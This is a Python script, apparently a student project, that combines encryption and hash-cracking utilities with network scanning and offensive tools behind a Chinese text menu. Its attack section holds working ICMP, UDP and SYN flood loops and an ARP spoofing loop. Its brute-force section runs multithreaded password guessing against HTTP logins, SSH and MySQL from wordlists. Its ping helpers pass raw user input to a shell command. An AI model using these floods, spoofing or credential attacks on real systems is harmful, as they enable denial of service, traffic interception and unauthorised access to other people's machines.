学生做的一个项目示例,包含解密类,攻击类,爆破类脚本,额外需要一些密码字典,公私钥文件等.
import base64
import hashlib
from concurrent.futures import ThreadPoolExecutor, as_completed
import rsa
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad
from scapy.all import *
from scapy.layers.inet import *
from scapy.layers.l2 import *
import whois
import json
import pymysql
import requests
import paramiko
#主菜单打印消息
main_menu_str = """
欢迎使用抽象工具包!
[1] 加密类 [2] 解密类
[3] 扫描类 [4] 攻击类
[5] 爆破类 [6] 退出程序
"""
# 主菜单
def main_menu():
print(main_menu_str)
choice = input("请输入选项: ")
if choice == '1':
encryption_menu() # 加密类
elif choice == '2':
decryption_menu() # 解密类
elif choice == '3':
scan_menu() # 扫描类
elif choice == '4':
attack_menu() # 攻击类
elif choice == '5':
brute_menu() # 爆破类
elif choice == '6':
exit()
else:
print("输入错误,请重新输入!")
main_menu()
#加密类菜单打印消息
encryption_menu_str = """
请选择要使用的功能:
[1] base64编码
[2] MD5加密
[3] SHA-256加密
[4] AES加密
[5] RSA加密
[6] 返回上一级菜单
[7] 退出程序
"""
# 加密类菜单
def encryption_menu():
print(encryption_menu_str)
choice = input("请输入选项: ")
if choice == '1':
base64_encode() # base64编码
elif choice == '2':
md5_encode() # MD5加密
elif choice == '3':
sha256_encode() # SHA-256加密
elif choice == '4':
aes_encrypt() # AES加密
elif choice == '5':
rsa_encrypt() # RSA加密
elif choice == '6':
main_menu() # 返回上一级菜单
elif choice == '7':
exit()
else:
print("输入错误,请重新输入!")
encryption_menu()
# base64编码
def base64_encode():
while True:
print("base64编码")
input_str = input("请输入要编码的内容: ")
output_str = base64.b64encode(input_str.encode('utf-8')).decode('utf-8')
print("编码后的内容为: ", output_str)
while True:
base64_input = input("是否继续输入其他要编码的内容? (y:继续/n:返回菜单) ")
if base64_input == 'y':
break
elif base64_input == 'n':
encryption_menu()
return
else:
print(f"输入错误: {base64_input},请重新输入!")
# MD5加密
def md5_encode():
while True:
print("MD5加密")
input_str = input("请输入要加密的内容: ")
# 加密
md5_hash = hashlib.md5(input_str.encode('utf-8')).hexdigest()
print("MD5加密后的内容为: ", md5_hash)
while True:
md5_input = input("是否继续输入其他要加密内容? (y:继续/n:返回菜单) ")
if md5_input == 'y':
break
elif md5_input == 'n':
encryption_menu()
return
else:
print(f"输入错误: {md5_input},请重新输入!")
# SHA-256加密
def sha256_encode():
while True:
print("SHA-256加密")
input_str = input("请输入要加密的内容: ")
# SHA-256加密
sha256_hash = hashlib.sha256(input_str.encode('utf-8')).hexdigest()
print("SHA-256加密后的内容为: ", sha256_hash)
while True:
sha_input = input("是否继续输入其他要加密内容? (y:继续/n:返回菜单) ")
if sha_input == 'y':
break
elif sha_input == 'n':
encryption_menu()
return
else:
print(f"输入错误: {sha_input},请重新输入!")
# 自动填充或生成AES密钥
def generate_key(key_input=None):
# 如果没有输入密钥,则自动生成16字节的随机数作为密钥
if key_input is None:
# 自动生成16字节的随机数作为密钥
key = get_random_bytes(16)
print("生成了随机密钥: ", key.hex())
else: # 如果输入了密钥,则检查长度是否合法,不合法则自动填充
# 将普通字符串转换为字节
key = key_input.encode('utf-8')
# 确保密钥长度为16字节
if len(key) < 16:
key = key.ljust(16, b'\0') # 使用ljust方法空字节填充至16字节
print(f"输入的密钥不足16字节,已自动填充为: {key.hex()}")
elif len(key) > 16:
key = key[:16] # 截取前16字节
print(f"输入的密钥超过16字节,已截取为: {key.hex()}")
return key
# AES加密
def aes_encrypt():
while True:
print("AES加密")
key_input = input("请输入加密密钥(不输入则自动生成,不满16字节则自动填充,超过16字节则截取前16字节): ")
# 生成密钥
key = generate_key(key_input)
input_str = input("请输入要加密的内容: ").encode('utf-8')
# 生成随机的初始向量(IV)
iv = get_random_bytes(16)
# 创建AES加密对象,使用CBC模式
cipher = AES.new(key, AES.MODE_CBC, iv)
# 填充加密数据
encrypted_data = cipher.encrypt(pad(input_str, AES.block_size))
# 输出加密后的数据
encrypted_output = base64.b64encode(encrypted_data).decode('utf-8')
print("AES密钥为: ", key.hex())
print("AES初始向量为: ", iv.hex())
print("AES加密后的内容为: ", encrypted_output)
print("请妥善保存密钥以及初始向量,以便解密!")
while True:
aes_input = input("是否继续输入其他要加密内容? (y:继续/n:返回菜单) ")
if aes_input == 'y':
break
elif aes_input == 'n':
encryption_menu()
return
else:
print(f"输入错误: {aes_input},请重新输入!")
# RSA 加密
def rsa_encrypt():
while True:
print("RSA加密")
public_key, private_key = rsa.newkeys(1024) # 生成RSA密钥对
input_str = input("请输入要加密的内容: ")
# 使用公钥加密
encryptor = rsa.encrypt(input_str.encode("utf-8"), public_key)
# 将加密后的内容编码为Base64字符串
encrypted_base64 = base64.b64encode(encryptor).decode("utf-8")
# 将公钥和私钥保存到文件
with open("public_key.pem", "wb") as public_key_file:
public_key_file.write(public_key.save_pkcs1())
with open("private_key.pem", "wb") as private_key_file:
private_key_file.write(private_key.save_pkcs1())
# # 公钥私钥序列化一下,输出出去,以便保存
# print("公钥为: ", public_key.save_pkcs1().decode("utf-8"))
# print("密钥为: ", private_key.save_pkcs1().decode("utf-8"))
print("加密后的内容为: ", encrypted_base64)
print("密钥已存储,路径为:private_key.pem,请妥善保存密钥,以便解密!")
while True:
rsa_input = input("是否继续输入其他要加密内容? (y:继续/n:返回菜单) ")
if rsa_input == 'y':
break
elif rsa_input == 'n':
encryption_menu()
return
else:
print(f"输入错误: {rsa_input},请重新输入!")
#解密类菜单打印消息
decryption_menu_str = """
请选择要使用的功能:
[1] base64解码
[2] MD5解密
[3] SHA-256解密
[4] AES解密
[5] RSA解密
[6] 返回上一级菜单
[7] 退出程序
"""
# 解密类菜单
def decryption_menu():
print(decryption_menu_str)
choice = input("请输入选项: ")
if choice == '1':
base64_decode() # base64解码
elif choice == '2':
md5_decode() # MD5解码
elif choice == '3':
sha256_decode() # SHA-256解码
elif choice == '4':
aes_decrypt() # AES解密
elif choice == '5':
rsa_decrypt() # RSA解密
elif choice == '6':
main_menu() # 返回上一级菜单
elif choice == '7':
exit()
else:
print("输入错误,请重新输入!")
decryption_menu()
# base64解码
def base64_decode():
while True:
print("base64解码")
input_str = input("请输入要解码的内容: ")
try:
# 这里try一下,优雅一点,报错少点
output_str = base64.b64decode(input_str.encode('utf-8')).decode('utf-8')
print("解码后的内容为: ", output_str)
except (ValueError, UnicodeDecodeError):
print("输入的字符串不是有效的Base64编码,请重新输入!")
continue
while True:
base64_input = input("是否继续输入其他要解码的内容? (y:继续/n:返回菜单) ")
if base64_input == 'y':
break
elif base64_input == 'n':
decryption_menu()
return
else:
print(f"输入错误: {base64_input},请重新输入!")
# 通过字典尝试破解MD5
def md5_crack(md5_hash, pwd_dict='pwd_dict.txt'):
with open(pwd_dict, 'r') as file:
for line in file:
password = line.strip()
# MD5加密
hashed_password = hashlib.md5(password.encode('utf-8')).hexdigest()
# 检查是否匹配
if hashed_password == md5_hash:
print(f"找到了匹配的明文: {password}")
return
print("未能找到匹配的明文。")
# MD5解码
def md5_decode():
while True:
print("MD5解密")
md5_hash = input("请输入要解密的MD5值: ")
md5_crack(md5_hash)
while True:
md5_input = input("是否继续输入其他要解密的MD5值? (y:继续/n:返回菜单) ")
if md5_input == 'y':
break
elif md5_input == 'n':
decryption_menu()
return
else:
print(f"输入错误: {md5_input},请重新输入!")
# 通过字典尝试破解SHA-256
def sha256_crack(sha256_hash, pwd_dict='pwd_dict.txt'):
with open(pwd_dict, 'r') as file:
for line in file:
password = line.strip()
# SHA-256加密
hashed_password = hashlib.sha256(password.encode('utf-8')).hexdigest()
# 检查是否匹配
if hashed_password == sha256_hash:
print(f"找到了匹配的明文: {password}")
return
print("未能找到匹配的明文。")
# SHA-256 解码
def sha256_decode():
while True:
print("SHA-256解密")
sha256_hash = input("请输入要解密的SHA-256值: ")
sha256_crack(sha256_hash)
while True:
sha256_input = input("是否继续输入其他要解密的SHA-256值? (y:继续/n:返回菜单) ")
if sha256_input == 'y':
break
elif sha256_input == 'n':
decryption_menu()
return
else:
print(f"输入错误: {sha256_input},请重新输入!")
# AES解密
def aes_decrypt():
while True:
print("AES解密")
# 输入解密密钥
key_input = input("请输入解密密钥: ")
key = bytes.fromhex(key_input)
# print(key)
if len(key) !=16:
print("输入的密钥长度不正确,请重新输入!")
continue
# 输入初始向量(IV)
iv_input = input("请输入初始向量(IV): ")
iv = bytes.fromhex(iv_input)
# print(iv)
# 输入要解密的内容
encrypted_input = input("请输入要解密的内容: ")
encrypted_data = base64.b64decode(encrypted_input)
# 创建AES解密对象,使用CBC模式
cipher = AES.new(key, AES.MODE_CBC, iv)
# 解密
decrypted_data = cipher.decrypt(encrypted_data)
# 去除填充
decrypted_data = unpad(decrypted_data, AES.block_size)
# 输出解密后的数据
print("解密后的内容为: ", decrypted_data.decode())
while True:
aes_input = input("是否继续输入其他要解密的内容? (y:继续/n:返回菜单) ")
if aes_input == 'y':
break
elif aes_input == 'n':
decryption_menu()
return
else:
print(f"输入错误: {aes_input},请重新输入!")
# RSA解密
def rsa_decrypt():
while True:
print("RSA解密")
# 从文件读取私钥
file_path = input("请输入私钥文件的路径: ")
try:
with open(file_path, "r") as file:
private_key_input = file.read()
except FileNotFoundError:
print("文件未找到,请检查路径是否正确。")
continue
# #调用load_pkcs1方法,将私钥字符串转换为私钥对象
private_key = rsa.PrivateKey.load_pkcs1(private_key_input.encode("utf-8"))
# 输入加密内容
encrypted_base64 = input("请输入要解密的内容: ")
# 解码加密内容
encrypted_data = base64.b64decode(encrypted_base64)
# 解密
decrypted_data = rsa.decrypt(encrypted_data, private_key).decode("utf-8")
print("解密后的内容为: ", decrypted_data)
while True:
rsa_input = input("是否继续输入其他要解密的内容? (y:继续/n:返回菜单) ")
if rsa_input == 'y':
break
elif rsa_input == 'n':
decryption_menu()
return
else:
print(f"输入错误: {rsa_input},请重新输入!")
# 扫描类菜单打印消息
scan_menu_str = """
请选择要使用的功能:
[1] 活跃主机扫描
[2] 活跃端口扫描
[3] 子域名扫描
[4] web站点信息扫描
[5] 返回上一级菜单
[6] 退出程序
"""
# 扫描类菜单
def scan_menu():
print(scan_menu_str)
choice = input("请输入选项: ")
if choice == '1':
active_host_scan() # 活跃主机扫描
elif choice == '2':
port_scan() # 可用端口扫描
elif choice == '3':
subdomain_scan() # 子域名扫描
elif choice == '4':
web_info_scan() # web站点信息扫描
elif choice == '5':
main_menu() # 返回上一级菜单
elif choice == '6':
exit()
else:
print("输入错误,请重新输入!")
scan_menu()
# 活跃主机扫描
def active_host_scan():
while True:
print("活跃主机扫描")
print("[1] 扫描单个活跃主机")
print("[2] 扫描网段内活跃主机")
choice = input("请输入扫描类型: ")
if choice == '1': # 扫描单个主机
single_host_scan()
elif choice == '2': # 扫描网段内活跃主机
subnet_scan()
else:
print("输入错误,请重新输入!")
active_host_scan()
while True:
active_input = input("是否继续输入其他要扫描的主机? (y:继续/n:返回菜单) ")
if active_input == 'y':
break
elif active_input == 'n':
scan_menu()
return
else:
print(f"输入错误: {active_input},请重新输入!")
# 单个主机扫描
def single_host_scan():
ip_address = input("请输入要扫描的主机IP地址: ")
#用 ping命令实现
ip_output = os.popen(f"ping -n 1 -w 1000 {ip_address}").read()
if "TTL" in ip_output:
print(f"主机{ip_address} 可达")
else:
print(f"主机{ip_address} 不可达")
# 扫描网段内活跃主机
def subnet_scan():
# 定义IP网段的正则表达式
pattern = r"^(\d{1,3}\.\d{1,3}\.\d{1,3})\.0$"
ip_address = input("请输入要扫描的网段 (格式:192.168.3.0): ")
# 检查输入的网段格式是否正确
match = re.match(pattern, ip_address)
if not match:
print("输入的网段格式不正确。请使用正确的格式,例如192.168.3.0")
return
# 提取子网部分
subnet = match.group(1)
global_results = []
# 使用 ThreadPoolExecutor 来处理线程
with ThreadPoolExecutor(max_workers=100) as executor:
# 提交任务到线程池
futures = [executor.submit(subnet_scan_thread, subnet, i * 5, (i + 1) * 5) for i in range(51)]
# 获取每个线程的结果 并合并到global_results中
for future in as_completed(futures):
try:
result = future.result()
global_results.extend(result)
except Exception as e:
print(f"错误信息: {e}")
print(f"网段{subnet}内的活跃主机有:")
print("\n".join(global_results))
# 子网扫描线程函数
def subnet_scan_thread(subnet,start, end):
li=[]
for i in range(start+1, end+1):
target_ip = f"{subnet}.{i}"
pkg = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target_ip)
pkg_response = srp1(pkg, iface="Intel(R) Wireless-AC 9560 160MHz", timeout=1, verbose=0)
if pkg_response is not None:
li.append(target_ip)
return li
# 可用端口扫描
def port_scan():
port_list = [7, 21, 22, 23, 25, 43, 53, 67, 68, 69, 79, 80, 81, 88, 109, 110, 113, 119, 123, 135, 135,
137, 138, 139, 143, 161, 162, 179, 194, 220, 389, 443, 445, 465, 513, 520, 520, 546, 547,
554, 563, 631, 636, 991, 993, 995, 1080, 1194, 1433, 1434, 1494, 1521, 1701, 1723, 1755,
1812, 1813, 1863, 3269, 3306, 3307, 3389, 3544, 4369, 5060, 5061, 5355, 5432, 5671, 5672, 6379,
7001, 8080, 8081, 8088, 8443, 8883, 8888, 9443, 9988, 9988, 15672, 50389, 50636, 61613, 61614]
"""验证 IP 地址格式是否正确"""
pattern = r"^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$"
while True:
print("活跃端口扫描")
ip_address = input("请输入要扫描的主机IP地址: ")
# 检查输入的IP地址格式是否正确
match = re.match(pattern, ip_address)
if not match:
print("输入的IP格式不正确。请使用正确的格式,例如192.168.3.16")
continue
num=0
for i in port_list:
random_port = random.randint(2000, 4000)
pkg1 = IP(dst=ip_address) / TCP(sport=random_port, dport=i, flags="S")
pkg2 = sr1(pkg1, timeout=1, verbose=0)
if pkg2 and pkg2.haslayer(TCP):
flag = pkg2[TCP].flags
if flag == "SA":
print(f"主机{ip_address} 端口{i} 开放")
num+=1
if num == 0:
print(f"主机{ip_address} 无端口活跃")
while True:
port_input = input("是否继续输入其他要扫描的端口? (y:继续/n:返回菜单) ")
if port_input == 'y':
break
elif port_input == 'n':
scan_menu()
return
else:
print(f"输入错误: {port_input},请重新输入!")
# 子域名扫描
def subdomain_scan():
subdomains = [
"www", "mail", "ftp", "ns1", "ns2", "blog", "dev", "test", "admin", "api", "webmail", "mx",
"shop", "portal", "secure", "vpn", "beta", "staging", "support", "cpanel", "forum", "news",
"m", "mobile", "img", "cdn", "static", "assets", "files", "backup", "office", "cloud",
"data", "database", "db", "download", "uploads", "media", "video", "image", "web", "wiki",
"docs", "doc", "help", "search", "email", "lists", "newsletter", "mail1", "mail2", "mail3",
"imap", "smtp", "pop", "pop3", "relay", "gateway", "router", "gw", "firewall", "proxy",
"monitor", "analytics", "log", "logs", "auth", "oauth", "sso", "payment", "billing", "invoice",
"user", "account", "users", "accounts", "dashboard", "manage", "admin1", "admin2", "admin3",
"test1", "test2", "test3", "stage", "prod", "production", "dev1", "dev2", "dev3", "qa",
"sandbox", "local", "localhost", "demo", "trial", "guest", "partner", "partners", "customer",
"clients", "client", "events", "event", "promo", "promotion", "offers", "marketing", "ads",
"ad", "campaign", "social", "connect", "community", "forum", "discussion", "qa", "question",
"chat", "talk", "call", "voice", "phone", "sms", "mms", "notification", "notify", "alerts",
"jobs", "careers", "hire", "recruit", "recruitment", "app", "apps", "application", "software",
"config", "configuration", "setup", "install", "license", "licensing", "update", "upgrade",
"version", "release", "patch", "fix", "bug", "issue", "report", "tracker", "status", "health",
"uptime", "downtime", "sla", "service", "services", "monitor", "monitoring", "stats", "statistics",
"metrics", "scorecard", "chart", "graph", "visualize", "viz", "alert", "alerts", "warning",
"danger", "critical", "log", "logs", "record", "records", "audit", "security", "safe", "vault",
"password", "passwd", "auth", "authorize", "authentication", "login", "signin", "signout", "signup",
"register", "unregister", "account", "accounts", "billing", "invoice", "checkout", "purchase",
"order", "cart", "payment", "pay", "gateway", "pg", "cc", "credit", "card", "creditcard", "wallet"
]
while True:
print("子域名扫描")
domain = input("请输入要扫描的域名(格式:example.com): ")
# 校验域名格式
domain_pattern = r"^(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}$"
if not re.match(domain_pattern, domain):
print("输入的域名格式不正确。请使用正确的格式,例如 example.com")
continue
results = []
with ThreadPoolExecutor(max_workers=100) as executor:
# 提交任务到线程池
futures = [executor.submit(ping_subdomain, subdomain, domain) for subdomain in subdomains]
# 获取每个线程的结果 并添加到 results 中
for future in as_completed(futures):
result = future.result()
if result:
results.append(result)
print(f"域名 {domain} 的子域名有:")
print("\n".join(results))
while True:
subdomain_input = input("是否继续输入其他要扫描的域名? (y:继续/n:返回菜单) ")
if subdomain_input == 'y':
break
elif subdomain_input == 'n':
scan_menu()
return
else:
print(f"输入错误: {subdomain_input},请重新输入!")
# 子域名扫描线程函数
def ping_subdomain(subdomain, domain):
ip_address = f"{subdomain}.{domain}"
try:
# 使用 ping 命令检查子域名
response = os.popen(f"ping -n 1 -w 1000 {ip_address}").read()
if "TTL" in response:
return ip_address
except Exception as e:
print(f"查询 {ip_address} 时发生错误: {e}")
# web站点信息扫描
def web_info_scan():
while True:
print("web站点信息扫描")
web = input("请输入要扫描的站点(格式:www.example.com): ")
# 校验网址格式
web_pattern = r"^(?:http(s)?:\/\/)?[\w.-]+(?:\.[\w\.-]+)+[\w\-\._~:/?#[\]@!\$&'\(\)\*\+,;=.]+$"
if not re.match(web_pattern, web):
print("输入的站点格式不正确。请使用正确的格式,例如 www.example.com")
continue
result = whois.whois(web)
dict = json.loads(str(result))
print(f"域名 {web} 的信息如下:")
for key, value in dict.items():
print(f"{key}: {value}")
while True:
web_input = input("是否继续输入其他要扫描的站点? (y:继续/n:返回菜单) ")
if web_input == 'y':
break
elif web_input == 'n':
scan_menu()
return
else:
print(f"输入错误: {web_input},请重新输入!")
#攻击类菜单打印消息
attack_menu_str = """
请选择要使用的功能:
[1] ICMP泛洪攻击
[2] UDP泛洪攻击
[3] TCP泛洪攻击
[4] ARP欺骗攻击
[5] 返回上一级菜单
[6] 退出程序
"""
# 攻击类菜单
def attack_menu():
print(attack_menu_str)
choice = input("请输入选项: ")
if choice == '1':
icmp_flood() # icmp泛洪攻击
elif choice == '2':
udp_flood() # UDP泛洪攻击
elif choice == '3':
tcp_flood() # TCP泛洪攻击
elif choice == '4':
arp_spoof() # ARP欺骗攻击
elif choice == '5':
main_menu() # 返回上一级菜单
elif choice == '6':
exit() # 退出程序
else:
print("输入错误,请重新输入!")
attack_menu()
# icmp泛洪攻击
def icmp_flood():
print("ICMP泛洪攻击")
while True:
# 用户输入目标IP地址
target_ip = input("请输入目标IP地址 (格式:192.168.3.16): ")
ip_pattern = r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$"
if not re.match(ip_pattern, target_ip):
print("输入的IP地址格式不正确。请使用正确的格式,例如 192.168.3.16")
continue
# 构造ICMP包
pkg = IP(dst=target_ip) / ICMP(type=8, code=0) / Raw(load="你在狗叫什么?" * 1000)
# 发送ICMP包
print(f"开始向 {target_ip} 发送ICMP泛洪攻击... 按 Ctrl+C 停止")
try:
while True:
send(pkg, iface="Intel(R) Wireless-AC 9560 160MHz")
except KeyboardInterrupt:
print("\n攻击已停止。")
# 询问用户是否继续
while True:
user_input = input("是否继续攻击其他目标? (y:继续/n:返回菜单) ")
if user_input == 'y':
break
elif user_input == 'n':
attack_menu()
return
else:
print(f"输入错误: {user_input},请重新输入!")
# UDP泛洪攻击
def udp_flood():
print("UDP泛洪攻击")
while True:
# 用户输入目标IP地址
target_ip = input("请输入目标IP地址 (格式:192.168.3.16): ")
ip_pattern = r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$"
if not re.match(ip_pattern, target_ip):
print("输入的IP地址格式不正确。请使用正确的格式,例如 192.168.3.16")
continue
# 用户输入目标端口号
try:
target_port = int(input("请输入目标端口号 (例如:500): "))
if not (1 <= target_port <= 65535):
raise ValueError
except ValueError:
print("输入的端口号不正确。请使用1到65535之间的端口号。")
continue
# 发送UDP包
print(f"开始向 {target_ip}:{target_port} 发送UDP泛洪攻击... 按 Ctrl+C 停止")
try:
while True:
random_port = random.randint(1024, 65535)
pkg = IP(dst=target_ip) / UDP(sport=random_port, dport=target_port) / Raw(load="你在狗叫什么?" * 1000)
send(pkg, iface="Intel(R) Wireless-AC 9560 160MHz")
except KeyboardInterrupt:
print("\n攻击已停止。")
# 询问用户是否继续
while True:
user_input = input("是否继续攻击其他目标? (y:继续/n:返回菜单) ")
if user_input == 'y':
break
elif user_input == 'n':
attack_menu()
return
else:
print(f"输入错误: {user_input},请重新输入!")
# TCP泛洪攻击
def tcp_flood():
print("TCP泛洪攻击")
while True:
# 用户输入目标IP地址
target_ip = input("请输入目标IP地址 (格式:192.168.3.16): ")
ip_pattern = r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$"
if not re.match(ip_pattern, target_ip):
print("输入的IP地址格式不正确。请使用正确的格式,例如 192.168.3.16")
continue
# 用户输入目标端口号
try:
target_port = int(input("请输入目标端口号 (例如:500): "))
if not (1 <= target_port <= 65535):
raise ValueError
except ValueError:
print("输入的端口号不正确。请使用1到65535之间的端口号。")
continue
# 发送TCP包
print(f"开始向 {target_ip}:{target_port} 发送TCP泛洪攻击... 按 Ctrl+C 停止")
try:
while True:
random_port = random.randint(1024, 65535)
pkg = IP(dst=target_ip) / TCP(sport=random_port, dport=target_port, flags="S") / Raw(load="你在狗叫什么?" * 1000)
send(pkg, iface="Intel(R) Wireless-AC 9560 160MHz")
except KeyboardInterrupt:
print("\n攻击已停止。")
# 询问用户是否继续
while True:
user_input = input("是否继续攻击其他目标? (y:继续/n:返回菜单) ")
if user_input == 'y':
break
elif user_input == 'n':
attack_menu()
return
else:
print(f"输入错误: {user_input},请重新输入!")
# ARP欺骗攻击
def arp_spoof():
print("ARP欺骗攻击")
while True:
# 用户输入目标IP地址和MAC地址
target_ip = input("请输入目标IP地址 (格式:192.168.3.31): ")
ip_pattern = r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$"
if not re.match(ip_pattern, target_ip):
print("输入的IP地址格式不正确。请使用正确的格式,例如 192.168.3.31")
continue
target_mac = input("请输入目标MAC地址 (格式:10:F6:0A:83:D1:05): ")
mac_pattern = r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$"
if not re.match(mac_pattern, target_mac):
print("输入的MAC地址格式不正确。请使用正确的格式,例如 10:F6:0A:83:D1:05")
continue
# 用户输入伪装IP地址和伪装MAC地址
spoof_ip = input("请输入伪装的IP地址 (格式:192.168.3.16): ")
if not re.match(ip_pattern, spoof_ip):
print("输入的伪装IP地址格式不正确。请使用正确的格式,例如 192.168.3.16")
continue
spoof_mac = input("请输入伪装的MAC地址 (格式:DC:71:96:F8:54:30): ")
if not re.match(mac_pattern, spoof_mac):
print("输入的伪装MAC地址格式不正确。请使用正确的格式,例如 DC:71:96:F8:54:30")
continue
# 构造ARP欺骗包
arp_response = Ether(dst=target_mac) / ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac, op=2)
# 发送ARP欺骗包
print(f"开始对 {target_ip} 进行ARP欺骗攻击... 按 Ctrl+C 停止")
try:
while True:
sendp(arp_response, iface="Intel(R) Wireless-AC 9560 160MHz")
except KeyboardInterrupt:
print("\n攻击已停止。")
# 询问用户是否继续
while True:
user_input = input("是否继续攻击其他目标? (y:继续/n:返回菜单) ")
if user_input == 'y':
break
elif user_input == 'n':
attack_menu()
return
else:
print(f"输入错误: {user_input},请重新输入!")
#爆破类菜单打印消息
brute_menu_str = """
请选择要使用的功能:
[1] HTTP爆破
[2] SSH爆破
[3] Mysql爆破
[4] 返回上一级菜单
[5] 退出程序
"""
# 爆破类菜单
def brute_menu():
print(brute_menu_str)
choice = input("请输入选项: ")
if choice == '1':
http_brute() # HTTP爆破
elif choice == '2':
ssh_brute() # SSH爆破
elif choice == '3':
mysql_brute() # Mysql爆破
elif choice == '4':
main_menu() # 返回上一级菜单
elif choice == '5':
exit()
else:
print("输入错误,请重新输入!")
brute_menu()
# HTTP爆破全局变量,用于判断是否已经找到正确的组合
httpfound = False
# HTTP爆破子线程函数
def attempt_http_login(url, username, password):
global httpfound
if httpfound:
return None # 如果已经找到密码,直接返回
try:
print(f"尝试组合: {username}:{password}")
# 模拟POST请求
response = requests.post(url, data={'username': username,'password': password,'verifycode': '0000'})
# print(response.text)
if 'login-fail' not in response.text:
print(f"登录成功: {username}:{password}")
httpfound = True # 找到正确组合,设置全局变量为 True
return f"登录成功: {username}:{password}"
except requests.RequestException as e:
print(f"请求错误: {e}")
return None
# HTTP爆破
def http_brute():
global httpfound
while True:
# 全局变量
httpfound = False
print("HTTP爆破")
# 用户输入目标URL
url = input("请输入目标URL (格式:http://example.com/login): ")
url_pattern = r"^http://[^\s/$.?#].[^\s]*$"
if not re.match(url_pattern, url):
print("输入的URL格式不正确。请使用正确的格式,例如 http://example.com/login")
continue
# 读取用户名和密码字典文件
with open("username_dict.txt", 'r') as uf:
usernames = uf.read().splitlines()
with open("pwd_dict.txt", 'r') as pf:
passwords = pf.read().splitlines()
global_results = [] # 用于存储成功的结果
# 使用 ThreadPoolExecutor 进行多线程处理
with ThreadPoolExecutor(max_workers=100) as executor:
futures = []
for username in usernames:
for password in passwords:
if httpfound: # 如果已经找到成功的组合,停止提交新任务
break
futures.append(executor.submit(attempt_http_login, url, username, password))
# 收集结果
for future in as_completed(futures):
result = future.result()
if result:
global_results.append(result)
break # 爆破成功后终止
if global_results:
print("爆破成功结果:")
print("\n".join(global_results))
else:
print("未能爆破成功。")
# 询问用户是否继续
while True:
user_input = input("是否继续攻击其他目标? (y:继续/n:返回菜单) ")
if user_input == 'y':
break
elif user_input == 'n':
brute_menu()
return
else:
print(f"输入错误: {user_input},请重新输入!")
# SSH爆破全局变量,用于判断是否已经找到正确的组合
ssh_found = False
# SSH爆破子线程函数
def attempt_ssh_login(target_ip, username, password):
global ssh_found
if ssh_found:
return None # 如果已经找到密码,直接返回
try:
print(f"尝试组合: {username}:{password}")
transport = paramiko.Transport((target_ip, 22))
transport.connect(username=username, password=password)
print(f"登录成功: {username}:{password}")
transport.close()
ssh_found = True # 找到正确组合,设置全局变量为 True
return f"成功: {username}:{password}"
except paramiko.SSHException as e:
print(f"SSH 连接错误: {e}")
# SSH爆破
def ssh_brute():
global ssh_found
while True:
# 重置全局变量
ssh_found = False
print("SSH爆破")
# 用户输入目标IP地址
target_ip = input("请输入目标IP地址 (格式:192.168.3.16): ")
ip_pattern = r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$"
if not re.match(ip_pattern, target_ip):
print("输入的IP地址格式不正确。请使用正确的格式,例如 192.168.3.16")
continue
# 读取用户名和密码字典文件
with open("username_dict.txt", 'r') as uf:
usernames = uf.read().splitlines()
with open("pwd_dict.txt", 'r') as pf:
passwords = pf.read().splitlines()
global_results = [] # 用于存储成功的结果
# 使用 ThreadPoolExecutor 进行多线程处理
with ThreadPoolExecutor(max_workers=10) as executor:
futures = []
for username in usernames:
for password in passwords:
if ssh_found:
break # 如果已经找到成功的组合,停止提交新任务
futures.append(executor.submit(attempt_ssh_login, target_ip, username, password))
# 收集结果
for future in as_completed(futures):
result = future.result()
if result:
global_results.append(result)
break # 爆破成功后终止
if global_results:
print("爆破成功结果:")
print("\n".join(global_results))
else:
print("未能爆破成功。")
# 询问用户是否继续
while True:
user_input = input("是否继续攻击其他目标? (y:继续/n:返回菜单) ")
if user_input == 'y':
break
elif user_input == 'n':
brute_menu()
return
else:
print(f"输入错误: {user_input},请重新输入!")
# SQL爆破全局变量,用于判断是否已经找到正确的组合
sqlfound = False
# Mysql爆破子线程函数
def attempt_mysql_login(target_ip, username, password):
global sqlfound
if sqlfound:
return None # 如果已经找到密码,直接返回
try:
print(f"尝试组合: {username}:{password}")
conn = pymysql.connect(host=target_ip, user=username, password=password)
print(f"登录成功: {username}:{password}")
conn.close()
sqlfound = True # 找到正确组合,设置全局变量为 True
return f"成功: {username}:{password}"
except:
return None
# Mysql爆破
def mysql_brute():
global sqlfound
while True:
# 全局变量
sqlfound = False
print("Mysql爆破")
# 输入目标IP地址
target_ip = input("请输入目标IP地址 (格式:192.168.3.16): ")
ip_pattern = r"^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$"
if not re.match(ip_pattern, target_ip):
print("输入的IP地址格式不正确。请使用正确的格式,例如 192.168.3.16")
continue
# 读取用户名和密码字典文件
with open("username_dict.txt", 'r') as uf:
usernames = uf.read().splitlines()
with open("pwd_dict.txt", 'r') as pf:
passwords = pf.read().splitlines()
global_results = [] # 用于存储成功的结果
# 使用 ThreadPoolExecutor 进行多线程处理
with ThreadPoolExecutor(max_workers=100) as executor:
futures = []
for username in usernames:
for password in passwords:
if sqlfound:
break # 如果已经找到成功的组合,停止提交新任务
futures.append(executor.submit(attempt_mysql_login, target_ip, username, password))
# 收集结果
for future in as_completed(futures):
result = future.result()
if result:
global_results.append(result)
break # 爆破成功后终止
if global_results:
print("爆破成功结果:")
print("\n".join(global_results))
else:
print("未能爆破成功。")
# 询问用户是否继续
while True:
user_input = input("是否继续攻击其他目标? (y:继续/n:返回菜单) ")
if user_input == 'y':
break
elif user_input == 'n':
brute_menu()
return
else:
print(f"输入错误: {user_input},请重新输入!")
if __name__ == '__main__':
main_menu()